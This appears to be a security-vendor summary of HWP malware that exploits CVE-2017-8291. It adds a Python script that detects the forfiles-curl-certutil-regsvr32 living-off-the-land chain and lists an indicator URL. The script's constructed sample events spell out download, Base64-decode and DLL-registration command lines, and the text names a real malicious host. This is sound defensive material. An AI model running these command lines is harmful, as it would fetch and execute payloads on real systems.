HWP malware related to academic conference support being distributed (original title: 학술대회 지원관련 한글(HWP) 악성코드 유포 중)

2020-06-24 | AhnLab

https://asec.ahnlab.com/1337


AhnLab ASEC reported HWP malware distributed around South Korea’s academic conference season, including an online conference support-themed lure document. The document exploited the EPS vulnerability CVE-2017-8291 and used Windows utilities such as forfiles.exe, curl.exe, certutil.exe, and regsvr32 to execute commands, download a Base64-encoded DLL, decode it, and run the payload. The payload was detected as Backdoor/Win64.Akdoor and retrieved content from thestreetsmartsalesman.com/wp-content/uploads/wp-logs/category.php. The source does not attribute the activity to a named actor, but the tradecraft gives defenders concrete detection points around HWP/EPS exploitation, living-off-the-land utilities, and the listed download infrastructure.
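The utility chain named above (forfiles.exe launching a command, curl.exe writing a file to disk, certutil.exe decoding Base64, regsvr32 registering the result) is visible in ordinary process-creation telemetry. The following detection sketch is an added example, not code from the ASEC report or from this summary: it scores each process tree by how many distinct stages of that chain appear in it, so that a single benign certutil or regsvr32 invocation does not alert on its own. The event records, the hwp.exe host process name, the file paths and the download host are all constructed for the example.

```python
"""Score process trees for the forfiles -> curl -> certutil -decode -> regsvr32
living-off-the-land chain described in the ASEC summary.

Sample events below are constructed for illustration; the parent process name
(hwp.exe), paths and download host are assumptions, not values from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # executable file name
    cmdline: str   # full command line as logged


# One rule per chain stage: (rule name, image name, command-line predicate).
RULES = [
    # forfiles used as a launcher: the /c switch runs an arbitrary command
    ("forfiles_launch", "forfiles.exe",
     lambda c: re.search(r"(?:^|\s)/c(?:\s|$)", c, re.I) is not None),
    # curl asked to save the response to a file (-o / -O / --output)
    ("curl_download_to_disk", "curl.exe",
     lambda c: re.search(r"(?:^|\s)(?:-o|-O|--output)(?:\s|$)", c) is not None),
    # certutil used as a Base64/hex decoder rather than for certificates
    ("certutil_decode", "certutil.exe",
     lambda c: re.search(r"\s-decode(?:hex)?(?:\s|$)", c, re.I) is not None),
    # regsvr32 loading a DLL from a user-writable location
    ("regsvr32_user_path", "regsvr32.exe",
     lambda c: re.search(r"\\(?:temp|appdata|public|downloads)\\", c, re.I) is not None),
]


def match_rules(ev: ProcEvent) -> list[str]:
    """Return the names of all rules this single event satisfies."""
    image = ev.image.lower()
    return [name for name, img, pred in RULES if image == img and pred(ev.cmdline)]


def root_of(pid: int, by_pid: dict[int, ProcEvent]) -> int:
    """Walk ppid links to the top-most ancestor present in the event set."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def detect(events: list[ProcEvent], min_rules: int = 2) -> dict[int, dict]:
    """Group rule hits by process-tree root; report roots with >= min_rules stages.

    Requiring several distinct stages in one tree suppresses isolated benign
    uses of certutil, curl or regsvr32 while still catching the full chain.
    """
    by_pid = {e.pid: e for e in events}
    groups: dict[int, dict] = {}
    for e in events:
        hits = match_rules(e)
        if not hits:
            continue
        root = root_of(e.pid, by_pid)
        g = groups.setdefault(root, {"root_image": by_pid[root].image,
                                     "rules": set(), "pids": []})
        g["rules"].update(hits)
        g["pids"].append(e.pid)
    return {
        root: {"root_image": g["root_image"],
               "rules": sorted(g["rules"]),
               "pids": sorted(g["pids"])}
        for root, g in groups.items() if len(g["rules"]) >= min_rules
    }


# Constructed telemetry: one tree mimicking the described chain under an
# assumed hwp.exe host, plus an unrelated benign tree under explorer.exe.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "hwp.exe", r"hwp.exe C:\Users\u\Downloads\lure.hwp"),
    ProcEvent(200, 100, "forfiles.exe",
              r'forfiles /p C:\Windows\System32 /m cmd.exe /c "@file /c stage.bat"'),
    ProcEvent(300, 200, "cmd.exe", r"cmd.exe /c stage.bat"),
    ProcEvent(310, 300, "curl.exe",
              r"curl.exe -o C:\Users\u\AppData\Local\Temp\a.txt https://download.invalid/x"),
    ProcEvent(320, 300, "certutil.exe",
              r"certutil.exe -decode C:\Users\u\AppData\Local\Temp\a.txt "
              r"C:\Users\u\AppData\Local\Temp\a.dll"),
    ProcEvent(330, 300, "regsvr32.exe", r"regsvr32.exe /s C:\Users\u\AppData\Local\Temp\a.dll"),
    # benign activity: certificate verification and a vendor DLL registration
    ProcEvent(400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(410, 400, "certutil.exe", r"certutil.exe -verify C:\certs\vendor.cer"),
    ProcEvent(420, 400, "regsvr32.exe", r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll"),
]


if __name__ == "__main__":
    for root, info in detect(SAMPLE_EVENTS).items():
        print(f"root pid {root} ({info['root_image']}): "
              f"{len(info['rules'])} stages {info['rules']} via pids {info['pids']}")
```

The constructed run flags only the tree rooted at the assumed hwp.exe process, with all four stages present, and stays silent on the explorer.exe tree even though it also contains certutil and regsvr32. In production the same grouping would key on the logging source's process GUIDs rather than reused PIDs, and the user-writable path list would be tuned to the estate.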

Indicators of Compromise

Type  Value                             First Seen  Last Seen
URL   https://www.thestreetsmartsales…  2020-06-24  2020-06-24
